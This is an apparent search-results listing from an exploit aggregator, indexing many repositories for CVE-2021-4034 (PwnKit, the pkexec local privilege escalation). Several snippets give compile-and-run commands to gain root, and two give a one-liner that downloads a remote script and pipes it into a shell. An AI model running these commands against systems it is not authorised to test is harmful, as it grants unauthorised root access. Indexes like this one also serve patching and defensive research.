Lucene search
+L

453 matches found

Kitploit
Kitploit
added 2026/09/16 3:20 a.m.5 views

cve-2021-4034

cve-2021-4034 Easy to use shell implementation of CVE-2021-4034 that was released yesterday. The original C code was sourced from https://github.com/arthepsy/CVE-2021-4034...

7.8CVSS7.2AI score0.94921EPSS
SaveExploits155References1
Kitploit
Kitploit
added 2026/09/16 3:18 a.m.5 views

polkit_CVE-2021-4034

Role Name Ansible role to patch RHSB-2022-001 Polkit Privilege Escalation - CVE-2021-4034 Requirements Repositories should be configured. Role Variables All the variables are in /vars/main.yml file. A list of polkit vulnerable packages is also added to the file as a list, you can update the list...

7.8CVSS7.4AI score0.94921EPSS
SaveExploits155
Kitploit
Kitploit
added 2026/09/16 2:30 a.m.5 views

cve-2021-4034

CVE-2021-4034 this tool use for pkexec single command execute POC whoami root@kitploit: test@localhost cc$ ./a.out /usr/bin/whoami execute success : root ping 8.8.8.8 root@kitploit: test@localhost cc$ ./a.out /usr/bin/ping 8.8.8.8 execute success : PING 8.8.8.8 8.8.8.8 5684 bytes of data. 64 byte...

7.8CVSS7.5AI score0.94921EPSS
SaveExploits155References1
Kitploit
Kitploit
added 2026/09/16 1:19 a.m.9 views

CVE-2021-4034

CVE-2021-4034 self contained bash script, just run and pwn! with reference to Qualys' blog post https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt...

7.8CVSS7.2AI score0.94921EPSS
SaveExploits155
Kitploit
Kitploit
added 2026/09/16 12:11 a.m.4 views

Exploiting-PwnKit-CVE-2021-4034-

PwnKit Self-contained exploit for CVE-2021-4034 - Pkexec Local Privilege Escalation Usage Should work out of the box on vulnerable Linux distributions based on Ubuntu, Debian, Fedora, and CentOS. root@kitploit: sh -c "$curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit.sh"...

7.8CVSS7.3AI score0.94921EPSS
SaveExploits155References1
Kitploit
Kitploit
added 2026/09/15 11:17 p.m.7 views

CVE-2021-4034

CVE-2021-4034 Three PoCs, two collected from elsewhere, one is my own — converted the Python3 script into a Python2 script. Usage: C usage: gcc cve-2021-4034-poc.c -o exp ./exp Python2 usage: python2 CVE-2021-4034-py2.py Python3 usage: python3 CVE-2021-4034-py3.py Feel free to give a star...

7.8CVSS7.2AI score0.94921EPSS
SaveExploits155
Kitploit
Kitploit
added 2026/09/15 9:23 p.m.7 views

PwnKit-Exploit

PwnKit-Exploit CVE-2021-4034 @c0br40x help to make this section in README!! Proof of Concept root@kitploit: debian@debian:/PwnKit-Exploit$ make cc -Wall exploit.c -o exploit debian@debian:/PwnKit-Exploit$ whoami debian debian@debian:/PwnKit-Exploit$ ./exploit Current User before execute exploit...

7.8CVSS7.1AI score0.94921EPSS
SaveExploits155
Kitploit
Kitploit
added 2026/09/15 8:57 p.m.7 views

cve-2021-4034

cve-2021-4034 cve-2021-4034 的 PoC 基于 https://haxx.in 的 PoC:https://haxx.in/files/blasty-vs-pkexec.c。他大概是 https://github.com/blasty 吧?我不确定。 感谢 https://github.com/daimoniac 的一点帮助。 如何使用? 编译 cve-2021-4034.c root@kitploit: gcc -Wall cve-2021-4034.c -o cve-2021-4034-exploit 执行 Ansible Playbook...

7.8CVSS7.4AI score0.94921EPSS
SaveExploits155References3
Kitploit
Kitploit
added 2026/09/15 8:08 p.m.2 views

Pwnkit-CVE-2021-4034-LPE

Pwnkit - CVE-2021-4034 Local Privilege Escalation Tested On OS: Ubuntu 20.04 pkexec: 0.105 PoC: root@kitploit: gcc pwnkit.c -o exploit && ./exploit Vulnerability CVE: CVE-2021-4034 Affected Component: pkexec Vulnerability Type: Local Privilege Escalation...

7.8CVSS7.4AI score0.94921EPSS
SaveExploits155
Kitploit
Kitploit
added 2026/09/15 7:34 p.m.7 views

PwnKit

PwnKit 此仓库包含一个我开发的漏洞利用程序,用于理解 Polkit Pkexec 漏洞:CVE-2021-4034 Pkexec 本地权限提升。Polkit(原名 PolicyKit)是一个组件,其功能是控制类 Unix 操作系统上的权限。它以有序的方式提供了一种机制,让无特权进程能够与有特权进程通信。该漏洞允许任何用户——系统上的普通用户,无管理权限——达到系统最高权限。 该漏洞发生在 pkexec 的 main 函数处理命令行参数时,当参数为 0 时。该函数尝试访问参数列表,最终试图访问 argvvoid(一个命令行参数控制器),也就是说,当 pkexec...

7.8CVSS7.4AI score0.94921EPSS
SaveExploits155References2
Kitploit
Kitploit
added 2026/09/15 7:10 p.m.10 views

pwnkit-helper

Pkexec Local Privilege Escalation PwnKit Exploit source. If You Want To Know More About This Exploit, Check: CVE-2021-4034 This Exploit Helper Work Fine With Python3, And Make Sure You Installed The Packages. Will Make It So Easy To Get The Root Fl4g, GOOD LUCK!...

7.8CVSS7.2AI score0.94921EPSS
SaveExploits155References1
Kitploit
Kitploit
added 2026/09/15 6:51 p.m.4 views

CVE-2021-4034

CVE-2021-4034 Local privilege escalation via pkexec Watch the ✨ YouTube Video...

7.8CVSS7.2AI score0.94921EPSS
SaveExploits155
Kitploit
Kitploit
added 2026/09/15 6:32 p.m.5 views

PwnKit-CVE-2021-4034

PwnKit-CVE-2021-4034...

7.8CVSS6.8AI score0.94921EPSS
SaveExploits155
Kitploit
Kitploit
added 2026/09/15 6:30 p.m.6 views

PwnKit-CVE-2021-4034-

PwnKit-CVE-2021-4034- A rewrite of the Polkit vulnerability...

7.8CVSS7.2AI score0.94921EPSS
SaveExploits155
Kitploit
Kitploit
added 2026/09/15 6:01 p.m.5 views

PwnKit-CVE-2021-4034

PwnKit-CVE-2021-4034 PoC for PwnKit-CVE-2021-4034 - Pkexec Local Privilege Escalation...

7.8CVSS7.2AI score0.94921EPSS
SaveExploits155
Kitploit
Kitploit
added 2026/09/15 3:46 p.m.5 views

CVE-2021-4034

CVE-2021-4034 Local privilege escalation via pkexec YouTube video Watch the ✨ YouTube Video Run locally root@kitploit: make all && ./pwnkit && make clean Run in docker root@kitploit: Build the docker image docker build -t pwnkit . Run the exploit docker run -it pwnkit bash make all && ./pwnkit &&...

7.8CVSS7.4AI score0.94921EPSS
SaveExploits155
Kitploit
Kitploit
added 2026/09/15 3:28 p.m.6 views

Pwnkit-CVE-2021-4034

Pwnkit-CVE-2021-4034 Automation Exploit...

7.8CVSS7.2AI score0.94921EPSS
SaveExploits155
Kitploit
Kitploit
added 2026/09/15 3:16 p.m.4 views

CVE-2021-4034

CVE-2021-4034 Run and get root...

7.8CVSS7.2AI score0.94921EPSS
SaveExploits155
Kitploit
Kitploit
added 2026/09/15 10:17 a.m.4 views

CVE-2021-4034_Python3

CVE-2021-4034Python3...

7.8CVSS6.9AI score0.94921EPSS
SaveExploits155
Kitploit
Kitploit
added 2026/09/15 9:20 a.m.13 views

PwnKit

PwnKit Self-contained exploit for CVE-2021-4034 - Pkexec Local Privilege Escalation Usage Should work out of the box on vulnerable Linux distributions based on Ubuntu, Debian, Fedora, and CentOS. root@kitploit: sh -c "$curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit.sh"...

7.8CVSS7.3AI score0.94921EPSS
SaveExploits155References1
Rows per page
Query Builder